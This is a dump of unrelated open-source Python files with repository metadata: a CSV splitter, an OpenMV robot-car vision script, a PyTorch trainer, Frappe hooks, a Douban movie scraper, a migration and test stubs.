# 设置每个文件需要有的行数,初始化为1000W
chunksize=10000
data1=pd.read_table(filename,chunksize=chunksize,sep=',',encoding='gbk')
# print(data1)
# num表示总行数
num=0
for chunk in data1:
num+=len(chunk)
# print(num)
# chunksize表示每个文件需要分配到的行数
chunksize=round(num/file_num+1)
# print(chunksize)
# 分离文件名与扩展名os.path.split(filename)
head,tail=os.path.split(filename)
data2=pd.read_table(filename,chunksize=chunksize,sep=',',encoding='gbk')
i=0
for chunk in data2:
chunk.to_csv('{0}_{1}{2}'.format(head,i,tail),header=None,index=False)
print('保存第{0}个数据'.format(i))
i+=1
else:
# 获得每个文件需要的行数
chunksize=10000
data1=pd.read_table(filename,chunksize=chunksize,header=None,sep=',')
num=0
for chunk in data1:
num+=len(chunk)
chunksize=round(num/file_num+1)
head,tail=os.path.split(filename)
data2=pd.read_table(filename,chunksize=chunksize,header=None,sep=',')
i=0
for chunk in data2:
chunk.to_csv('{0}_{1}{2}'.foemat(head,i,tail),header=None,index=False)
print('保存第{0}个数据'.format(i))
i+=1
filename='/Users/jiajinlong/PycharmProjects/zk120000w.csv'
#num为拆分为的文件个数
Data_split(filename,2,header=True)
|
[
"jiajinlong0301@hotmail.com"
] |
jiajinlong0301@hotmail.com
|
5221169cb09ef2c4efb91362996d07102086d2d9
|
fb8b3a8d5aff40d9d3169e53d94887f3053eb891
|
/19国赛openmv/main.py
|
77bf04f6390b17960c8a744531ea18e21cc7f910
|
[] |
no_license
|
nmgzzy/smart-car-history
|
e4f887da98bd53a59ac8c0c42cc3933d59d4e8a1
|
7d5f7eecb9692792a345ef8092add42013e2bb4a
|
refs/heads/master
| 2021-04-01T21:15:26.868584
| 2020-03-18T12:16:15
| 2020-03-18T12:16:15
| 248,215,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,989
|
py
|
import sensor, image, time, pyb
import my_ips, my_file, my_uart, my_key
sensor.reset()
sensor.set_pixformat(sensor.RGB565)
sensor.set_framerate(2<<11)
sensor.set_framesize(sensor.QQVGA)#160x120
my_ips.init()
sensor.skip_frames(time = 500)
sensor.set_auto_gain(False)
sensor.set_auto_whitebal(False)
sensor.skip_frames(time = 100)
clock = time.clock()
ledR = pyb.LED(1)
ledG = pyb.LED(2)
ledB = pyb.LED(3)
ledB.on()
ledR.on()
ledG.on()
colorxy = 0
img_cnt = 0
red_threshold = [[12, 80, 16, 73, -1, 56],[12, 80, 16, 73, -1, 56],[12, 80, 16, 73, -1, 56],[0, 70, 19, 90, -11, 35]]
blue_threshold = [0, 50, -128, 127, -128, -5]
black_threshold = [0, 15, -128, 127, -128, 127]
white_threshold = [40, 100, -128, 127, -128, 127]
red_ch = 0
roi_white = [(109,0,2,120),(113,0,2,120),(117,0,2,120),(121,0,2,120)]
roi_white2 = [73,0,2,120]
roi_blue = [(0,21,33,77),(12,21,56,77),(0,21,68,77)]
roi_red = (47,25,103,70)
chioce = 2
def find_max(blobs):
max_size=0
for blob in blobs:
if blob[2]*blob[3] > max_size:
max_blob=blob
max_size = blob[2]*blob[3]
return max_blob
def my_cmp(a, b):
if a == b:
return (20,255,20)
else:
return (255,255,255)
def display(page, x, y, k, save):
global img_cnt
global red_ch
clock.tick()
img = sensor.snapshot()
if save:
img.save("img\\img%02d.jpg"%img_cnt)
img_cnt += 1
global colorxy
blobs = img.find_blobs([red_threshold[red_ch]], roi = roi_red, x_stride=5, y_stride=10, pixels_threshold=200)
if blobs:
road = find_max(blobs)
img.draw_rectangle(road.rect())
blobs = img.find_blobs([blue_threshold, black_threshold], roi = roi_blue[2], x_stride=3, y_stride=6, pixels_threshold=64)
if blobs:
road = find_max(blobs)
img.draw_rectangle(road.rect())
blobs = img.find_blobs([white_threshold], roi = roi_white[chioce], pixels_threshold=9)
if blobs:
road = find_max(blobs)
img.draw_rectangle(road.rect())
print(clock.fps())
if x == 3 and y == 0:
img.binary([white_threshold], zero = True)
else:
if y < 2:
img.binary([red_threshold[red_ch]], zero = True)
else:
img.binary([blue_threshold], zero = True)
img.draw_string(0,0, str(red_threshold[red_ch][0]),color = my_cmp(colorxy, 0),x_spacing = -2)
img.draw_string(0,10, str(red_threshold[red_ch][1]),color = my_cmp(colorxy, 1),x_spacing = -2)
img.draw_string(40,0, str(red_threshold[red_ch][2]),color = my_cmp(colorxy, 2),x_spacing = -2)
img.draw_string(40,10,str(red_threshold[red_ch][3]),color = my_cmp(colorxy, 3),x_spacing = -2)
img.draw_string(80,0, str(red_threshold[red_ch][4]),color = my_cmp(colorxy, 4),x_spacing = -2)
img.draw_string(80,10,str(red_threshold[red_ch][5]),color = my_cmp(colorxy, 5),x_spacing = -2)
img.draw_string(0, 20,"red", color = (255,255,255), x_spacing = -2)
img.draw_string(120,0,"wt:", color = my_cmp(colorxy, 6),x_spacing = -2)
img.draw_string(140,0,str(white_threshold[0]),color = my_cmp(colorxy, 6),x_spacing = -2)
img.draw_string(120,10,str(red_ch), color = (255,255,0), x_spacing = -2)
img.draw_string(0,90, "blue", color = (255,255,255), x_spacing = -2)
img.draw_string(0,100, str(blue_threshold[0]),color = my_cmp(colorxy, 8),x_spacing = -2)
img.draw_string(0,110, str(blue_threshold[1]),color = my_cmp(colorxy, 9),x_spacing = -2)
img.draw_string(40,100,str(blue_threshold[2]),color = my_cmp(colorxy, 10),x_spacing = -2)
img.draw_string(40,110,str(blue_threshold[3]),color = my_cmp(colorxy, 11),x_spacing = -2)
img.draw_string(80,100,str(blue_threshold[4]),color = my_cmp(colorxy, 12),x_spacing = -2)
img.draw_string(80,110,str(blue_threshold[5]),color = my_cmp(colorxy, 13),x_spacing = -2)
img.draw_string(120,110, "blk", color = my_cmp(colorxy, 14),x_spacing = -2)
img.draw_string(140,110,str(black_threshold[1]),color = my_cmp(colorxy, 14),x_spacing = -2)
if page == 0:
my_ips.display_QQVGA(0, 0, img)
if x == 0:
if y == 0:
red_threshold[red_ch][0] += k
colorxy = 0
elif y == 1:
red_threshold[red_ch][1] += k
colorxy = 1
elif y == 2:
blue_threshold[0] += k
colorxy = 8+0
elif y == 3:
blue_threshold[1] += k
colorxy = 8+1
elif x == 1:
if y == 0:
red_threshold[red_ch][2] += k
colorxy = 2
elif y == 1:
red_threshold[red_ch][3] += k
colorxy = 3
elif y == 2:
blue_threshold[2] += k
colorxy = 8+2
elif y == 3:
blue_threshold[3] += k
colorxy = 8+3
elif x == 2:
if y == 0:
red_threshold[red_ch][4] += k
colorxy = 4
elif y == 1:
red_threshold[red_ch][5] += k
colorxy = 5
elif y == 2:
blue_threshold[4] += k
colorxy = 8+4
elif y == 3:
blue_threshold[5] += k
colorxy = 8+5
elif x == 3:
if y == 0:
white_threshold[0] += k
colorxy = 6
elif y == 1:
red_ch += k
colorxy = 7
elif y == 3:
black_threshold[1] += k
colorxy = 8+6
def systemUI():
page = 0
Xsite = 0
Ysite = 0
global red_threshold
global blue_threshold
global black_threshold
global white_threshold
global red_ch
[red_threshold, blue_threshold, black_threshold, white_threshold, red_ch] = my_file.read_parameter()
my_ips.showstr(161, 0, "bR 30:127")
my_ips.showstr(161, 1, " -50:50")
my_ips.showstr(161, 3, "R 40:127")
my_ips.showstr(161, 4, " -20:70")
my_ips.showstr(161, 6, "yR 30:127")
my_ips.showstr(161, 7, " 10:127")
while(True):
save = 0
key = my_key.get_key()
if key == 3:#r
if Xsite<3:
Xsite += 1
elif key == 6:#l
if Xsite>0:
Xsite -= 1
elif key == 2:#u
if Ysite>0:
Ysite -= 1
elif key == 0:#d
if Ysite<3:
Ysite += 1
elif key == 1:#m
save = 1
if key == 4:
k = 1
elif key == 5:
k = -1
else:
k = 0
display(page, Xsite, Ysite, k, save)
if my_uart.read() == 0x0F:
break
my_file.save_parameter(red_threshold, blue_threshold, black_threshold, white_threshold, red_ch)
ledR.off()
ledB.off()
my_ips.spi.deinit()
time.sleep(200)
ledG.off()
def main():
while True:
clock.tick()
pix = 0
break_road = 0
cnt1 = 0
cnt2 = 0
mode = 0
hh = 0
cc = 0
img = sensor.snapshot()
t = my_uart.read()
if t!= None:
mode = t >> 7
offset = t & 0x7F
blobs = img.find_blobs([red_threshold[red_ch]], roi = roi_red, x_stride=5, y_stride=10, pixels_threshold=200)
if blobs:
road = find_max(blobs)
pix = road.pixels() * 255 // 3000
if pix > 255:
pix = 255
if mode == 0:
blobs = img.find_blobs([blue_threshold, black_threshold], roi = roi_blue[0], x_stride=3, y_stride=6, pixels_threshold=100)
if blobs:
road = find_max(blobs)
break_road = road.pixels()*255//2500
else:
blobs = img.find_blobs([blue_threshold, black_threshold], roi = roi_blue[1], x_stride=3, y_stride=6, pixels_threshold=100)
if blobs:
road = find_max(blobs)
break_road = (road.pixels()-150)*255//3400
if break_road < 0:
break_road = 0
if break_road > 255:
break_road = 255
if mode == 1:
blobs = img.find_blobs([white_threshold], roi = roi_white[chioce], pixels_threshold=20)
if blobs:
road = find_max(blobs)
hh = road.h()
cc = road.cy()+1
else:
roi_white2[0] = int(-0.3297*offset+106.2)-3
blobs = img.find_blobs([white_threshold], roi = roi_white2, pixels_threshold=20)
if blobs:
road = find_max(blobs)
hh = road.h()
cc = road.cy()+1
my_uart.send(pix,break_road,cc,hh)
if pix > 30:
ledR.on()
else:
ledR.off()
if break_road > 170:
ledB.on()
else:
ledB.off()
print(clock.fps())
systemUI()
main()
|
[
"283003556@qq.com"
] |
283003556@qq.com
|
64acd726fc80f2bd6451b0e36ae4cde1f625e944
|
8c2de4da068ba3ed3ce1adf0a113877385b7783c
|
/hyperion/torch/trainers/xvector_trainer.py
|
190b2a30b1c2f28d38d0c6999040ce4ae6a76f9f
|
[
"Apache-2.0"
] |
permissive
|
hyperion-ml/hyperion
|
a024c718c4552ba3a03aae2c2ca1b8674eaebc76
|
c4c9eee0acab1ba572843373245da12d00dfffaa
|
refs/heads/master
| 2023-08-28T22:28:37.624139
| 2022-03-25T16:28:08
| 2022-03-25T16:28:08
| 175,275,679
| 55
| 20
|
Apache-2.0
| 2023-09-13T15:35:46
| 2019-03-12T18:40:19
|
Python
|
UTF-8
|
Python
| false
| false
| 5,015
|
py
|
"""
Copyright 2019 Johns Hopkins University (Author: Jesus Villalba)
Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""
import os
from collections import OrderedDict as ODict
import logging
import torch
import torch.nn as nn
from ..utils import MetricAcc
from .torch_trainer import TorchTrainer
class XVectorTrainer(TorchTrainer):
"""Trainer to train x-vector style models.
Attributes:
model: x-Vector model object.
optim: pytorch optimizer object or options dict
epochs: max. number of epochs
exp_path: experiment output path
cur_epoch: current epoch
grad_acc_steps: gradient accumulation steps to simulate larger batch size.
device: cpu/gpu device
metrics: extra metrics to compute besides cxe.
lrsched: learning rate scheduler object or options dict
loggers: LoggerList object, loggers write training progress to std. output and file.
If None, it uses default loggers.
ddp: if True use distributed data parallel training
ddp_type: type of distributed data parallel in (ddp, oss_ddp, oss_shared_ddp)
loss: if None, it uses cross-entropy
train_mode: training mode in ['train', 'ft-full', 'ft-last-layer']
use_amp: uses mixed precision training.
log_interval: number of optim. steps between log outputs
use_tensorboard: use tensorboard logger
use_wandb: use wandb logger
wandb: wandb dictionary of options
grad_clip: norm to clip gradients, if 0 there is no clipping
grad_clip_norm: norm type to clip gradients
swa_start: epoch to start doing swa
swa_lr: SWA learning rate
swa_anneal_epochs: SWA learning rate anneal epochs
cpu_offload: CPU offload of gradients when using fully sharded ddp
"""
def __init__(
self,
model,
optim={},
epochs=100,
exp_path="./train",
cur_epoch=0,
grad_acc_steps=1,
device=None,
metrics=None,
lrsched=None,
loggers=None,
ddp=False,
ddp_type="ddp",
loss=None,
train_mode="train",
use_amp=False,
log_interval=10,
use_tensorboard=False,
use_wandb=False,
wandb={},
grad_clip=0,
grad_clip_norm=2,
swa_start=0,
swa_lr=1e-3,
swa_anneal_epochs=10,
cpu_offload=False,
):
if loss is None:
loss = nn.CrossEntropyLoss()
super().__init__(
model,
loss,
optim,
epochs,
exp_path,
cur_epoch=cur_epoch,
grad_acc_steps=grad_acc_steps,
device=device,
metrics=metrics,
lrsched=lrsched,
loggers=loggers,
ddp=ddp,
ddp_type=ddp_type,
train_mode=train_mode,
use_amp=use_amp,
log_interval=log_interval,
use_tensorboard=use_tensorboard,
use_wandb=use_wandb,
wandb=wandb,
grad_clip=grad_clip,
grad_clip_norm=grad_clip_norm,
swa_start=swa_start,
swa_lr=swa_lr,
swa_anneal_epochs=swa_anneal_epochs,
cpu_offload=cpu_offload,
)
def train_epoch(self, data_loader):
"""Training epoch loop
Args:
data_loader: pytorch data loader returning features and class labels.
"""
self.model.update_loss_margin(self.cur_epoch)
metric_acc = MetricAcc(device=self.device)
batch_metrics = ODict()
self.set_train_mode()
for batch, (data, target) in enumerate(data_loader):
self.loggers.on_batch_begin(batch)
if batch % self.grad_acc_steps == 0:
self.optimizer.zero_grad()
data, target = data.to(self.device), target.to(self.device)
batch_size = data.shape[0]
with self.amp_autocast():
output = self.model(data, target, **self.amp_args)
loss = self.loss(output, target).mean() / self.grad_acc_steps
if self.use_amp:
self.grad_scaler.scale(loss).backward()
else:
loss.backward()
if (batch + 1) % self.grad_acc_steps == 0:
if self.lr_scheduler is not None and not self.in_swa:
self.lr_scheduler.on_opt_step()
self.update_model()
batch_metrics["loss"] = loss.item() * self.grad_acc_steps
for k, metric in self.metrics.items():
batch_metrics[k] = metric(output, target)
metric_acc.update(batch_metrics, batch_size)
logs = metric_acc.metrics
logs["lr"] = self._get_lr()
self.loggers.on_batch_end(logs=logs, batch_size=batch_size)
logs = metric_acc.metrics
logs = ODict(("train_" + k, v) for k, v in logs.items())
logs["lr"] = self._get_lr()
return logs
|
[
"jesus.antonio.villalba@gmail.com"
] |
jesus.antonio.villalba@gmail.com
|
374b46162c7dde768082c279d494fa3a42728b61
|
ff623c438f0089cf23cdb089fde693e340882164
|
/metabase_ngse/hooks.py
|
27e6dd5cb62016922011c60514f74400182b1747
|
[
"MIT"
] |
permissive
|
Suraj787/metabase_ngse
|
eb1de77ff4e86685db0f2f98bb2a8376b5cd654a
|
be626804148650af73bb00926ed9052201274c04
|
refs/heads/master
| 2023-01-04T12:30:51.092201
| 2020-10-31T20:47:27
| 2020-10-31T20:47:27
| 308,969,125
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,154
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from . import __version__ as app_version
app_name = "metabase_ngse"
app_title = "Metabase Ngse"
app_publisher = "firsterp"
app_description = "Metabase for Nandan GSE"
app_icon = "octicon octicon-file-directory"
app_color = "grey"
app_email = "support@firsterp.in"
app_license = "MIT"
# Includes in <head>
# ------------------
# include js, css files in header of desk.html
# app_include_css = "/assets/metabase_ngse/css/metabase_ngse.css"
# app_include_js = "/assets/metabase_ngse/js/metabase_ngse.js"
# include js, css files in header of web template
# web_include_css = "/assets/metabase_ngse/css/metabase_ngse.css"
# web_include_js = "/assets/metabase_ngse/js/metabase_ngse.js"
# include js in page
# page_js = {"page" : "public/js/file.js"}
# include js in doctype views
# doctype_js = {"doctype" : "public/js/doctype.js"}
# doctype_list_js = {"doctype" : "public/js/doctype_list.js"}
# doctype_tree_js = {"doctype" : "public/js/doctype_tree.js"}
# doctype_calendar_js = {"doctype" : "public/js/doctype_calendar.js"}
# Home Pages
# ----------
# application home page (will override Website Settings)
# home_page = "login"
# website user home page (by Role)
# role_home_page = {
# "Role": "home_page"
# }
# Website user home page (by function)
# get_website_user_home_page = "metabase_ngse.utils.get_home_page"
# Generators
# ----------
# automatically create page for each record of this doctype
# website_generators = ["Web Page"]
# Installation
# ------------
# before_install = "metabase_ngse.install.before_install"
# after_install = "metabase_ngse.install.after_install"
# Desk Notifications
# ------------------
# See frappe.core.notifications.get_notification_config
# notification_config = "metabase_ngse.notifications.get_notification_config"
# Permissions
# -----------
# Permissions evaluated in scripted ways
# permission_query_conditions = {
# "Event": "frappe.desk.doctype.event.event.get_permission_query_conditions",
# }
#
# has_permission = {
# "Event": "frappe.desk.doctype.event.event.has_permission",
# }
# Document Events
# ---------------
# Hook on document methods and events
# doc_events = {
# "*": {
# "on_update": "method",
# "on_cancel": "method",
# "on_trash": "method"
# }
# }
# Scheduled Tasks
# ---------------
# scheduler_events = {
# "all": [
# "metabase_ngse.tasks.all"
# ],
# "daily": [
# "metabase_ngse.tasks.daily"
# ],
# "hourly": [
# "metabase_ngse.tasks.hourly"
# ],
# "weekly": [
# "metabase_ngse.tasks.weekly"
# ]
# "monthly": [
# "metabase_ngse.tasks.monthly"
# ]
# }
# Testing
# -------
# before_tests = "metabase_ngse.install.before_tests"
# Overriding Methods
# ------------------------------
#
# override_whitelisted_methods = {
# "frappe.desk.doctype.event.event.get_events": "metabase_ngse.event.get_events"
# }
#
# each overriding function accepts a `data` argument;
# generated from the base implementation of the doctype dashboard,
# along with any modifications made in other Frappe apps
# override_doctype_dashboards = {
# "Task": "metabase_ngse.task.get_dashboard_data"
# }
|
[
"Anikets@criscoconsulting.in"
] |
Anikets@criscoconsulting.in
|
8de04f6692ceeecd098e35ffafb2f1c85e4a9be7
|
cae1c6d385be49c48342733d105fe0ef817b4c02
|
/tajna.py
|
e77b4821e9372ac4094130b880fe3aacda51665e
|
[] |
no_license
|
silvikavcak/pyladies
|
f7c61228b5170dfec7537766abbe97f355d5feb9
|
da46798e76dfffdc1c91961b9b6271256ea48b40
|
refs/heads/main
| 2023-03-19T08:03:12.613500
| 2021-03-05T18:44:40
| 2021-03-05T18:44:40
| 344,892,517
| 0
| 0
| null | 2021-03-05T18:44:41
| 2021-03-05T17:59:45
|
Python
|
UTF-8
|
Python
| false
| false
| 308
|
py
|
heslo = input("Zadaj heslo a poviem ti tajnostku: ")
if heslo == "susky-susky":
print("Ak sa chytis prstom pravej ruky laveho ucha a pri tom poskaces 3x 50 cm vysoko, do zajtra bude na nebi o hviezdicku viac.")
else:
print("Tajomstvo velkej Arkany ti je zapovedane ty nehodny smrtelny cervik!")
|
[
"noreply@github.com"
] |
silvikavcak.noreply@github.com
|
aad8fc74a43007757734b635989c1238c35e75a1
|
da8cc1653f8ed4e553fb908a06a5b59e7113d188
|
/migrations/versions/053be705576c_new_fields_in_user_model.py
|
0a3697dbd131f4c0b4597105e4f10b6f8db52417
|
[] |
no_license
|
isaachulvey/tft-companion-app
|
31a6ae4e768f45c17a635188687079754cc8a876
|
ec80fcd0033315e92db78da8cf7575ecca7ad9a2
|
refs/heads/master
| 2022-10-07T05:04:28.935310
| 2020-04-08T18:58:02
| 2020-04-08T18:58:02
| 249,787,351
| 2
| 0
| null | 2022-09-16T18:21:09
| 2020-03-24T18:31:34
|
Python
|
UTF-8
|
Python
| false
| false
| 792
|
py
|
"""new fields in user model
Revision ID: 053be705576c
Revises: 7546358da6cd
Create Date: 2020-04-07 11:36:58.369264
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '053be705576c'
down_revision = '7546358da6cd'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('user', sa.Column('about_me', sa.String(length=140), nullable=True))
op.add_column('user', sa.Column('last_seen', sa.DateTime(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('user', 'last_seen')
op.drop_column('user', 'about_me')
# ### end Alembic commands ###
|
[
"isaachulvey@gmail.com"
] |
isaachulvey@gmail.com
|
775b26f16fa53c27ec712bf92cfb31553c92f19d
|
e24511af0fdf299130fdf1e27b7eda1e35064e7c
|
/app/coupon/apps.py
|
bab96066b77b4592b0cf454c6ef51fa085d53a67
|
[] |
no_license
|
amitbhalla/lms
|
623dc6764dba5ee67a7f30d3882b7917b6441c2e
|
0810a875008b371a7bd3996742ad3b04ce037b14
|
refs/heads/main
| 2023-07-19T12:12:40.570958
| 2021-09-17T16:55:29
| 2021-09-17T16:55:29
| 405,055,595
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 144
|
py
|
from django.apps import AppConfig
class CouponConfig(AppConfig):
default_auto_field = "django.db.models.BigAutoField"
name = "coupon"
|
[
"amit9815@gmail.com"
] |
amit9815@gmail.com
|
a2a16481c7b8f3bafa0f35b577b432e7fc6f2adc
|
b4272e8a7863c27644f104c42e1d99c6cd02d8a7
|
/15_printing_CL_arguments.py
|
5e066b025df1f3293dfcde3c98a25165554d2580
|
[] |
no_license
|
skanda9927/year2020
|
613856b7cfa3405f268d930fc4cbdd9897b5709e
|
3745e1caadb4051399505d2cc9e642a930a0c088
|
refs/heads/master
| 2020-12-22T04:15:44.428379
| 2020-01-28T05:50:43
| 2020-01-28T05:50:43
| 236,667,507
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 728
|
py
|
#15.Common line arguments to python: Print count, list them, print the last argument value
#PSEUDOCODE
# Step 1 : import the module named sys
# Step 2 : copy the variables stored in the system built in list argv
# Step 3 : find the length of argument_list using len function and store it nin variable length
# Step 4 : using for loop with length print all values stored in argument_list
import sys
# command line arguments are stored in the form
# of list in sys.argv
argumentList = sys.argv
length = len(argumentList)
for index in range(0,length) :
print (argumentList[index])
|
[
"noreply@github.com"
] |
skanda9927.noreply@github.com
|
d09ebfb916301f9570de15677478373cadbd685a
|
9db18bcc847ffdff8ca1aa8fe2470bdd1d17f609
|
/LAB1/generate_similar_event.py
|
32b83c22ea6385ae25638088ea0d280d905273fa
|
[] |
no_license
|
ShangGaoG/CVLAB
|
4397c125ec412329aa45af705465aae73b2f1d16
|
b9f1c24ba35a7af56f556a63796798bd4e8cc234
|
refs/heads/master
| 2023-03-25T15:48:07.566625
| 2020-12-09T00:49:54
| 2020-12-09T00:49:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,482
|
py
|
from utils.misc import *
import pandas as pd
from sklearn.metrics.pairwise import cosine_similarity
from matplotlib import pyplot as plt
import sys
import numpy as np
def generate_similar_events(query_path,gallery_path):
df = pd.read_json(gallery_path)
gallery_id = df['gallery_id']
gallery_vector = df['gallery_incident']
df_query_incident = pd.read_json(query_path)
query_id = df_query_incident['query_id']
query_vector = df_query_incident['query_incident']
gallery_vector = np.array(list(gallery_vector), dtype=float)
gallery_id = np.array(list(gallery_id))
query_vector = np.array(list(query_vector), dtype=float)
query_id = list(query_id)
length = len(query_id)
similar_events = []
for i in range(length):
id = query_id[i]
vector = query_vector[i]
similarity = cosine_similarity([vector], gallery_vector)
similarity = similarity.flatten()
arg_index = np.argsort(similarity)
arg_index = arg_index[::-1]
similarity_incident = gallery_id[list(arg_index[0:5])]
similar_events.append(similarity_incident)
df_new = pd.DataFrame({'query event':query_id,'similar events':similar_events})
df_new.to_csv('similar_event.csv')
df_new.to_json('similar_event.json')
query_path = '/home/xiaoxiaoyu/codes/imgs_cls/query_incident.json'
gallery_path = '/home/xiaoxiaoyu/codes/imgs_cls/gallery_incident.json'
generate_similar_events(query_path,gallery_path)
|
[
"11711603@mail.sustech.edu.cn"
] |
11711603@mail.sustech.edu.cn
|
209cf4447eef471a6961ceff4174497f1acc3937
|
caa947ea6cbbb44c80f01702a4076708451eaa73
|
/splider_for_douban.py
|
3c00e458a309669504c1bf16436621e9837d16df
|
[] |
no_license
|
lugq1990/chatbot_douban
|
e2696aa56657fda3d4afdc6775390db691df3e9b
|
f7d746dfcdd5ea853e99ad96c7dfe7cebc4b31e8
|
refs/heads/main
| 2023-08-27T01:36:55.246079
| 2021-10-25T07:21:17
| 2021-10-25T07:21:17
| 418,353,579
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,285
|
py
|
import re
from bs4 import BeautifulSoup
import requests
import time
import os
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
import json
class DoubanSplider:
def __init__(self) -> None:
self.base_top_url = "https://movie.douban.com/top250?start={}&filter="
self.headers = {'User-Agent': 'Mozilla/5.0'}
self.driver = webdriver.Chrome(ChromeDriverManager().install())
def get_response(self, url):
response = requests.get(url, headers=self.headers)
if response.status_code != 200:
print("Get some error from request! As error code is {}".format(response.status_code))
bs = BeautifulSoup(response.content, 'html.parser')
time.sleep(.2)
return bs
def get_response_with_driver(self, url):
self.driver.get(url)
bs = BeautifulSoup(self.driver.page_source, 'html.parser')
time.sleep(.1)
return bs
def get_top250_links(self):
each_page = 25
full_n = 250
res_tuple = []
for i in range(int(full_n/each_page)):
print("Now if page: {}".format(i))
bs = self.get_response_with_driver(self.base_top_url.format(i * each_page))
# find each page items
items = bs.find_all('div', class_='item')
for item in items:
each_item_info = self._get_top_content(item)
res_tuple.append(each_item_info)
return res_tuple
@staticmethod
def save_list_into_file(obj_list, file_name, file_path=None):
if not file_path:
file_path = 'tmp_data'
if file_name.find('.') == -1:
file_name += '.txt'
with open(os.path.join(file_path, file_name), 'w', encoding='utf-8') as f:
for obj in obj_list:
if isinstance(obj, list) or isinstance(obj, tuple):
f.write(','.join(obj) + '\n')
else:
f.write(obj + '\n')
@staticmethod
def _get_top_content(item):
title = item.find(class_='hd').find(class_='title').get_text()
url = item.find(class_='hd').find('a').get('href')
score = item.find_all("span", class_='rating_num')[0].get_text()
n_users = item.find_all("span")[-2].get_text()
return (title, score, n_users, url)
def get_movie_base_info(self):
"""
get_movie_base_info Just to use a open source link to get sample data based on movie ID.
"""
base_api_url = "https://movie.querydata.org/api?id={}"
# get full ids with movie name
with open(os.path.join('tmp_data', 'top250_link.txt'), 'r', encoding='utf-8') as f:
data_line = f.readlines()
movie_info_dict = {}
for data in data_line:
id = data.split(',')[-1].split("/")[-2]
movie_name = data.split(',')[0]
response = requests.get(base_api_url.format(id)).text
movie_info_dict[movie_name] = response
return movie_info_dict
if __name__ == '__main__':
splider = DoubanSplider()
res_link = splider.get_top250_links()
splider.save_list_into_file(res_link, 'top250_link.txt')
|
[
"guangqiang.lu@accenture.com"
] |
guangqiang.lu@accenture.com
|
583cccb8c6a66535f378859ee3db2a6dccf5f457
|
c3f3ce2557682a53199a5ff6e8faf988dfa395fa
|
/1 - Introduccion/ejercicio2.py
|
919c9eb7a908c3eb0d7afde5f95470d814441e24
|
[
"MIT"
] |
permissive
|
yang-itimec/Python-basics
|
b6a19cb94882fac917245ec9af2f3eca2bbc25d5
|
52fbe2019619d760d393dbfed96bbd823b9ba698
|
refs/heads/master
| 2020-04-10T17:44:27.691443
| 2018-12-14T14:47:57
| 2018-12-14T14:47:57
| 161,182,531
| 0
| 0
| null | 2018-12-11T15:44:54
| 2018-12-10T13:52:58
|
Python
|
UTF-8
|
Python
| false
| false
| 954
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 10 16:51:53 2018
@author: PENG YANG YANG
"""
########################
# TEMA 1 - EJERCICIO 2 #
########################
'''
Ejercicios mutaciones, alias y clonaciones
1- Crear una lista con los meses del año (lista1).
2- Crear un alias de la lista (lista2).
3- Clonar la lista (lista3).
4- Añadir a la lista1 “Fin de Año”
5- Mostrar la lista2 y la lista3.
'''
%reset -f
#%% 1- Crear una lista con los meses del año (lista1).
lista1 = ['Enero','Febrero','Marzo','Abril','Mayo','Junio','Julio','Agosto',
'Septiembre','Octubre','Noviembre','Diciembre']
lista1
#%% 2- Crear un alias de la lista (lista2).
lista2 = lista1
lista2
#%% 3- Clonar la lista (lista3).
lista3 = lista1[:]
lista3
#%% 4- Añadir a la lista1 “Fin de Año”
lista1.append('Fin de Año')
lista1
#%% 5- Mostrar la lista2 y la lista3.
print(lista2)
print(lista3)
|
[
"noreply@github.com"
] |
yang-itimec.noreply@github.com
|
4b3a9d826820ca989271e40c1f7f39529da12284
|
abe2b440071962ad1f0eaaf34ddfcccafba4b5f8
|
/15_descriptions.py
|
604ea6aea2f8b79fb547797d407d4684c46be0b4
|
[] |
no_license
|
shauseth/converting-bdb-to-48hd
|
f097e253648c9e8d49b539548cb58d5adfb1cb87
|
0c4daba99247d366b0da58b021e8d6a9ec78ae2e
|
refs/heads/master
| 2020-05-18T02:29:28.604783
| 2019-05-21T18:22:05
| 2019-05-21T18:22:05
| 184,116,399
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 671
|
py
|
# SH-I
import pandas as pd
import os
data = pd.read_csv('second-generation-2.csv')
id_list = []
seq_list = []
for filename in os.listdir('.'):
if filename == 'desc.py':
pass
elif filename == 'second-generation-2.csv':
pass
else:
# get IDs
split = filename.split('_')
id = split[0]
id_list.append(int(id))
# get sequences
file = open(filename, 'r')
seq = file.read()
seq_list.append(seq)
file.close()
dict = dict(zip(id_list, seq_list))
data['Sequences'] = data['MimotopeSetID'].map(dict)
print(data)
data.to_csv('second-generation-3.csv', index = False)
|
[
"noreply@github.com"
] |
shauseth.noreply@github.com
|
12b66e27cea728950994f9107bed6a3ac88c37e0
|
977fcb9a15da52340dab332f7668dde57317f9f3
|
/tests/sentry/mediators/sentry_app_installations/test_creator.py
|
501aa0dfe71cb01db55eb1eb8186413f1a00b25c
|
[
"BSD-2-Clause"
] |
permissive
|
conan25216/sentry
|
8649761d4cbd2ff7ec21b1ac171f0997da2e692f
|
fe38ab19fb096688140b2065da0e45fa26762200
|
refs/heads/master
| 2020-04-09T12:37:20.846884
| 2018-12-04T12:20:26
| 2018-12-04T12:20:26
| 160,357,556
| 1
| 0
|
BSD-3-Clause
| 2018-12-04T12:56:51
| 2018-12-04T12:56:50
| null |
UTF-8
|
Python
| false
| false
| 1,566
|
py
|
from __future__ import absolute_import
from mock import patch
from sentry.mediators.sentry_app_installations import Creator
from sentry.models import ApiAuthorization
from sentry.testutils import TestCase
class TestCreator(TestCase):
def setUp(self):
self.user = self.create_user()
self.org = self.create_organization()
self.sentry_app = self.create_sentry_app(
name='nulldb',
organization=self.org,
scopes=('project:read',),
)
self.creator = Creator(
organization=self.org,
